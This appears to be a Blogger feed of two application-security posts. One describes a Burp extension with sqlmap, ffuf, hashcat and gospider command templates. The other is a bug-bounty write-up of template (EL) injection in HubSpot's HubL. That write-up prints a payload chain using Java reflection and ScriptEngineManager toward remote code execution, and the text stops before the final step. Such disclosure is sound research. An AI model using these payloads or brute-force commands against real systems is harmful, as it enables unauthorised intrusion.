tag:blogger.com,1999:blog-45382516613352720602024-03-14T12:35:31.050+05:30{ Better } Hacker"I don't believe you have to be better than everybody else. I believe you have to be better than you ever thought you could be."
Unknownnoreply@blogger.comBlogger15125tag:blogger.com,1999:blog-4538251661335272060.post-72233738787542352102021-01-02T05:52:00.001+05:302021-02-07T04:18:17.624+05:30The Burp Extension No One Told You About<p><span style="font-family: inherit;">Some time last year, I came across a Burp extension on Github that replicates the <a class="notion-link-token notion-enable-hover" data-reactroot="" data-token-index="1" href="https://www.zaproxy.org/docs/desktop/addons/invoke-applications/" rel="noopener noreferrer" style="cursor: pointer; overflow-wrap: break-word; text-decoration: inherit;" target="_blank"><span style="border-bottom: 0.05em solid rgba(55, 53, 47, 0.4); border-color: rgba(55,53,47,0.4); border-left-color: rgba(55, 53, 47, 0.4); border-right-color: rgba(55, 53, 47, 0.4); border-top-color: rgba(55, 53, 47, 0.4); opacity: 0.7;">Invoke Applications</span></a> functionality from OWASP ZAP in Burp. Since discovering this extension, it has become a very big part of my Burp workflow and probably one of the first extensions that I install on Burp. Surprisingly, I haven't seen anyone else using this extension and the Github project seems rather unknown to most people as well.</span></p><p><span style="font-family: inherit;">The extension I am talking about is "<a class="notion-link-token notion-enable-hover" data-reactroot="" data-token-index="1" href="https://github.com/bytebutcher/burp-send-to" rel="noopener noreferrer" style="cursor: pointer; overflow-wrap: break-word; text-decoration: inherit;" target="_blank"><span style="border-bottom: 0.05em solid rgba(55, 53, 47, 0.4); border-color: rgba(55,53,47,0.4); border-left-color: rgba(55, 53, 47, 0.4); border-right-color: rgba(55, 53, 47, 0.4); border-top-color: rgba(55, 53, 47, 0.4); opacity: 0.7;">burp-send-to</span></a>" by "bytebutcher". </span></p><p><span style="font-family: inherit;">PS: <strike>I couldn't find the original author of the extension on Twitter, if you know "bytebutcher", please reach out to me so that I can say thank you for their work on this and update their contact info. </strike></span>Bytebutcher contacted me via email :) Follow him on <a href="https://twitter.com/bytebutcher" rel="nofollow" target="_blank">twitter</a> and keep an eye for more awesome projects on his <a href="https://github.com/bytebutcher" rel="nofollow" target="_blank">Github</a></p><p><span style="font-family: inherit;">Lets see what this extension is all about!</span></p><p><strong>Core Idea</strong></p><p>
</p><p>If you use BurpSuite regularly, you are probably familiar with sending requests from one tool to another tool within Burp. However, if you want to execute an external tool e.g. sqlmap or ffuf on an interesting endpoint, there is no native way of sending the request contents to these tools. In such cases, you have to either copy the URL or save the request as a file and then execute the desired tool yourself.</p>
<p>With "burp-send-to" (I will refer to the extension simply as "SendTo" from now on), you can invoke any external tool that you want with a predefined command. You can also pass any part of the request or response to the tool by using placeholders.</p><p><strong>Installation</strong></p>
<p>The SendTo extension can be downloaded from <a href="https://github.com/bytebutcher/burp-send-to" target="_blank">Github</a> as a jar file and install by importing into Burp. The extension is also available in Burp's BApp Store but is an older version.</p>
<p><strong>Usage</strong></p>
<p>The extension creates a new tab "SendTo" which contains a few sample commands to showcase how to use the extension. On this tab, you can define and manage your own commands.</p><p>Following placeholders can be used within your commands:</p>
<ul>
<li><strong>%H:</strong> will be replaced with the host</li>
<li><strong>%P:</strong> will be replaced with the port</li>
<li><strong>%T:</strong> will be replaced with the protocol</li>
<li><strong>%U:</strong> will be replaced with the url</li>
<li><strong>%A:</strong> will be replaced with the url path</li>
<li><strong>%Q:</strong> will be replaced with the url query</li>
<li><strong>%C:</strong> will be replaced with the cookies</li>
<li><strong>%M:</strong> will be replaced with the HTTP-method</li>
<li><strong>%S:</strong> will be replaced with the selected text</li>
<li><strong>%F:</strong> will be replaced with the path to a temporary file containing the selected text</li>
<li><strong>%R:</strong> will be replaced with the path to a temporary file containing the content of the focused request/response</li>
<li><strong>%E:</strong> will be replaced with the path to a temporary file containing the header of the focused request/response</li>
<li><strong>%B:</strong> will be replaced with the path to a temporary file containing the body of the focused request/response</li>
</ul><p>For example: if you normally execute sqlmap on any interesting URL, you can define the sqlmap command as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">sqlmap -u %U -f --dbs</span></code></pre></blockquote><p>
</p><p>The extension adds a right click context menu "Send to..." to allow sending the request/response to appropriate tool. So once you have identified an interesting request, simply right click on it and choose the command you wish to execute from the "SendTo" menu.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://raw.githubusercontent.com/bytebutcher/burp-send-to/master/images/burp-send-to-extension-intro.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="497" data-original-width="662" src="https://raw.githubusercontent.com/bytebutcher/burp-send-to/master/images/burp-send-to-extension-intro.png" /></a></div><br /><p><br /></p><p>By default, the extension is configured to use xterm to run the commands. You can change it to anything you like. I use KDE so I have defined the terminal options as:</p><p>
</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">konsole --hold -e %C</span></code></pre></blockquote><p><strong>Interesting use cases</strong></p><p></p><ol>
<li>ffuf with custom wordlist:</li>
</ol><p>I normally use FFUF with a wordlist using the following command:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><code><span style="font-family: courier;">ffuf -u <URL> -w wordlist -recursion -v -fs 0 -ac</span></code></p></blockquote><p>I have defined this in SendTo as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">/path/to/ffuf -u %U -w /path/to/wordlist -recursion -v -fs 0 -ac</span></code></pre></blockquote><p>caveat: When you want to send a request to ffuf, first you need to send that request to Repeater, change the part which you want to fuzz with the FUZZ keyword and then use SendTo extension to invoke ffuf.</p><ol start="2">
<li>gospider authenticated crawling</li>
</ol><p>A very useful feature of <a href="https://github.com/jaeles-project/gospider">gospider</a> is the ability to use headers from a HTTP request with <code>--burp</code> flag. This allows gospider to crawl the authenticated parts of an application without providing credentials or doing weird auth recording routines that never work (looking at you Portswigger!)</p><p>I have defined this in SendTo as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">gospider --site %U --burp %R --concurrent 10 --depth 3 -o /tmp/ --proxy http://127.0.0.1:8080</span></code></pre></blockquote><p>This command invokes gospider on the selected URL and also passes the entire request body as a file so that gospider can extract headers and perform authenticated crawling.</p><ol start="3">
<li>Hashcat to crack JWT</li>
</ol><p>Want to send the JWT token to hashcat for cracking?</p><p>Just select the token and invoke SendTo with following command:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">hashcat %F -m 16500 -a 3 -w 2 ?a?a?a?a?a</span></code></pre></blockquote><ol start="4">
<li>smuggler</li>
</ol><p>We all know the HTTP Request smuggler extension is great, but still want to execute the awesome <a href="https://github.com/defparam/smuggler" target="_blank">smuggler.py</a> script on a URL?</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">python /path/to/smuggler/smuggler.py -u %U</span></code></pre></blockquote><p>You can even select multiple URLs in Proxy history and send them all at once to any tool. You can also control whether the tool executes in parallel or in sequential fashion when multiple items are sent to a tool.</p><ol start="5">
<li>Brute force numeric parameter with ffuf</li>
</ol><p>A more advanced use requires some command-line fu but opens up a lot of possibilities when considering limitless potential of the command line. With the following command, you can bruteforce a numeric parameter using ffuf without ever going out of Burp:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><pre style="text-align: left;"><code class="language-bash"><span style="font-family: courier;">bash -c "seq -w 0 5 | ffuf --request %R -w -:FUZZ"</span></code></pre></blockquote><p>In this command, we are generating the numbers from 0 to 5 (change this as per your requirements) and passing the generated numbers to ffuf as stdin.</p><p>In my experience, ffuf performs at least 10x faster than Burp Intruder.</p><p>We can probably completely replace Burp Intruder by replicating its functionality with ffuf by utilising tricks such as the above. Maybe a topic for another blog post ;)</p><p>As you can see, the extension adds powerful capabilities to Burp and has limitless possibilities to improve your workflow.</p><p><strong>Wishlist</strong></p><p>Despite all the wonderful features it already has, I wish the author adds a couple more features to make it even better</p><p>
</p><ol>
<li>
<p>Automatic execution</p>
<p>Imagine you want to execute a particular tool on every request and response going through Burp while also passing relevant parts to the tool.</p>
<p><a href="https://github.com/silentsignal/burp-piper" target="_blank">Piper</a> can do this to some extent but I haven't figured out how to pass request contents to the tool.</p>
</li>
<li>
<p>Passing multiple inputs as single file</p>
<p>This seems pretty easy to implement. Something like selecting multiple URLs and passing all those URLs to a tool as file. Currently you can only pass the selected URLs directly on command line.</p>
</li>
</ol><p></p><p>All in all, this is a wonderful little gem of an extension, kudos to bytebutcher for excellent work. Try it out and let me know how you are using it. Follow me on <a href="https://twitter.com/fyoorer" target="_blank">twitter</a> for more such application security tidbits ;)</p><p></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-62349960685900160822018-12-07T11:00:00.002+05:302018-12-07T19:56:22.402+05:30RCE in Hubspot with EL injection in HubL<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">This is the story of how I was able to get remote code execution on <a href="https://www.hubspot.com/" target="_blank">Hubspot</a>'s servers by exploiting a vulnerability in <a href="https://designers.hubspot.com/docs/hubl/intro-to-hubl" target="_blank">HubL expression language</a>, which is used for creating templates and custom modules within the Hubspot CRM. I had absolutely no experience with these kinds of vulnerabilities before and it turned out to be a very interesting learning opportunity. In this post, I go through the process I followed while researching and how little pieces were connected together to achieve a much bigger goal. </span><br />
<div>
<h4 style="text-align: left;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Getting started</span></h4>
</div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">While working on the Hubspot's bugbounty program, I came across a functionality which looked very interesting. Users can create custom designs for emails or blogs from the design manager and can use HubL expression language in their templates.</span></div>
<div>
</div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Because HubL is a markup language, I began with the payload {{7*7}} and got a nice '49' back which means the server was treating anything within two curly brackets as HubL code. </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Bear in mind, at this point I didn't know anything about expression languages or HubL so I decided to fuzz the input and see what template engine is being used at server side by following the method posted at PortSwigger <a href="https://portswigger.net/blog/server-side-template-injection" target="_blank">blog</a></span><br />
<h3 style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-8DC50fPWy04/XAl_iDznbrI/AAAAAAAAUNs/FE2SgSu0lo4UOvY26QQjvpAJY9Pi5UGywCLcBGAs/s1600/template-identify.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="640" height="241" src="https://3.bp.blogspot.com/-8DC50fPWy04/XAl_iDznbrI/AAAAAAAAUNs/FE2SgSu0lo4UOvY26QQjvpAJY9Pi5UGywCLcBGAs/s400/template-identify.png" width="400" /></a></h3>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Interestingly the output didn't follow any known pattern and I reached "Unknown" or "Not Vulnerable". Giving up after a few tries is lame, so I decided it was time to <a href="https://designers.hubspot.com/docs/hubl/hubl-module-syntax-and-parameters" target="_blank">RTFM</a>!</span><br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> HubL Intro:</span></b><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">This is a very high level intro to HubL expression language and I am by no means an expert. The following section contains just enough information to understand what was happening and how I exploited the bug.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">The following 3 types of delimiters are used to separate HubL and HTML within the module's code.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">{% %} - statement delimiters</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br />HubL statements are used to create editable modules, define conditional template logic, set up for loops, define variables, and more.</span></div>
<div>
<br /></div>
<span style="font-family: "courier new" , "courier" , monospace;">{{ }} - expression delimiters </span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Anything between expression delimiters {{ }} will be evaluated by the templating engine, and thats what I was more interested in.</span><br />
<div>
<br /></div>
<span style="font-family: "courier new" , "courier" , monospace;">{# #} - comment delimiters</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Anything between the {# #} will be commented out or ignored by the parser.</span><br />
<div>
<div style="text-align: left;">
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Variables:</span><br />
<br />
<div style="text-align: left;">
<div style="text-align: left;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">There are some built in variables such as<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">{{ </span>account }}, {{ company_domain }}, {{ content }} </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">etc</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> which can be used within a module. The parser replaces these variables with their actual values at runtime. </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">e.g. </span></span><span style="font-family: "courier new" , "courier" , monospace;">{{ company_domain }} </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">will be replaced by Your Company's domain name. Users can also declare custom variables within statement {% %} blocks and these can be used within expression {{ }} blocks just like built-in variables.</span></span></div>
</div>
</div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Another interesting thing to note here is that the documentation says HubL is based on Jinja but as observed before, the output wasn't following normal Jinja pattern when evaluating the expressions. </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Let the hacking begin!</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">For all below examples, the payload was submitted in </span><span style="font-family: "courier new" , "courier" , monospace;">template_source</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> parameter in the POST request and its output was seen in </span><span style="font-family: "courier new" , "courier" , monospace;">output_html</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> & </span><span style="font-family: "courier new" , "courier" , monospace;">html</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> fields.</span><br />
<h4 style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-QghAw7ZcKvo/XAm45e3miFI/AAAAAAAAUOA/tN1PYwIOcoUWMGDcy4QA306ZSoWgqPp2ACLcBGAs/s1600/response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="828" height="246" src="https://2.bp.blogspot.com/-QghAw7ZcKvo/XAm45e3miFI/AAAAAAAAUOA/tN1PYwIOcoUWMGDcy4QA306ZSoWgqPp2ACLcBGAs/s320/response.png" width="320" /></a></h4>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After trying most of the built in variable names, I stumbled upon an undocumented variable: "request" which returned an interesting string.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload</span>: <span style="font-family: "courier new" , "courier" , monospace;">{{ request }}</span></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output:</span><span style="font-family: "courier new" , "courier" , monospace;"> com.hubspot.content.hubl.context.TemplateContextRequest@23548206</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Nice! This looks like the memory location of the 'request' object! And it also looked like Java from the naming convention. After some Google searches, I tried the following payloads to verify if its a Java based template engine:</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Convert a string to upper case -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.toUpperCase()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">A</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Concatenate two characters - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload:</span><span style="font-family: "courier new" , "courier" , monospace;"> {{'a'.concat('b')}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">ab</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Awesome! This looked very promising. The template engine not only parses its own syntax, it also allows us to call built-in methods. </span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><b> The Vulnerability </b></span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Trying to get the class of a character - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">java.lang.String</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Excellent! Java is confirmed! The vulnerability here is that it was possible to call the getClass() method on any object. </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">At this point I was sure this could be exploited to something bigger. </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">But before shooting for the moon, I wanted to understand how expression language works so I started by gathering more information:</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get class of the request object -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{request.getClass()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">class com.hubspot.content.hubl.context.TemplateContextRequest</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get declared methods of a class ( increment from 0 to any number to get all the methods)</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">- </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{request.getClass().getDeclaredMethods()[0]}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">At this point, I searched for "</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">com.hubspot.content.hubl.context.TemplateContextRequest" and discovered the <a href="https://github.com/HubSpot/jinjava/" target="_blank">Jinjava project on Github</a>.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Looking at the class declaration in the source, I was also able to call methods from the request class - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{request.isDebug()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">false</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">To take it a step further, I learnt that you can use the forName() and newInstance() methods to get an instance of a completely different class -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Using string 'a' to get an instance of class </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">sun.misc.Launcher -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">sun.misc.Launcher@715537d4</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">It is also possible to get a new object of the Jinjava class -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">com.hubspot.jinjava.JinjavaConfig@78a56797</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">It was also possible to call methods on the created object by combining the {% %} and {{ }} blocks -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}{{ji.render('{{1*2}}')}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Here, I created a variable 'ji' with new instance of </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">In the next block, I called the render method on 'ji' with expression {{1*2}}.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">2</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Jinjava Inception!</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">I now had enough understanding and was ready to get the coveted remote code execution. From what I'd read, that should be easy. Just create an object of java.lang.Runtime class and call the exec() method on it. So....</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('java.lang.Runtime').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">TemplateSyntaxException: java.lang.IllegalAccessException: Class javax.el.BeanELResolver can not access a member of class java.lang.Runtime with modifiers "private"</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Bummer! Looks like Runtime is blocked. To make sure I am not missing anything, I tried getting the declared methods of the Runtime class with getDeclaredMethods call and it worked fine, meaning that calling the newInstance() method on java.lang.Runtime class was not allowed. </span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Knowing Java's history, I was pretty sure there will be another way.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Time to find an alternative.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">First option: </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">java.lang.System</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('java.lang.System').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Ouput: </span><span style="font-family: "courier new" , "courier" , monospace;">TemplateSyntaxException: java.lang.IllegalAccessException: Class javax.el.BeanELResolver can not access a member of class java.lang.System with modifiers "private"</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Arrggh... one more candidate lost.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After frantic searches and asking around, I found this <a href="https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html" target="_blank">gem</a> of a blog which introduced to me to </span><span style="font-family: "courier new" , "courier" , monospace;">javax.script.ScriptEngineManager.</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br />Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">javax.script.ScriptEngineManager@727c1a89</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Amazing! So I got an object of ScriptEngineManager means RCE was on the horizon.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">But before that, I had to get to know my new friend </span><span style="font-family: "courier new" , "courier" , monospace;"><a href="https://docs.oracle.com/javase/7/docs/api/javax/script/ScriptEngineManager.html" target="_blank">ScriptEngineManager</a>.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Find out what type javascript engine this is</span><span style="font-family: "courier new" , "courier" , monospace;"> -</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript')}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">jdk.nashorn.api.scripting.NashornScriptEngine@7f97607a</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-fqem41QB84A/XAnoPqyqtoI/AAAAAAAAUOQ/aKhtq3mbb-AMXhpAG-qHxtX8rK3Iz0_0gCLcBGAs/s1600/javascript.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" data-original-height="301" data-original-width="572" height="210" src="https://2.bp.blogspot.com/-fqem41QB84A/XAnoPqyqtoI/AAAAAAAAUOQ/aKhtq3mbb-AMXhpAG-qHxtX8rK3Iz0_0gCLcBGAs/s400/javascript.jpg" title="" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A bounty writeup without a meme is not fun!</td></tr>
</tbody></table>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get the script context - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').getContext()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">jdk.nashorn.api.scripting.NashornScriptEngine@7f97607a</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get language name -</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
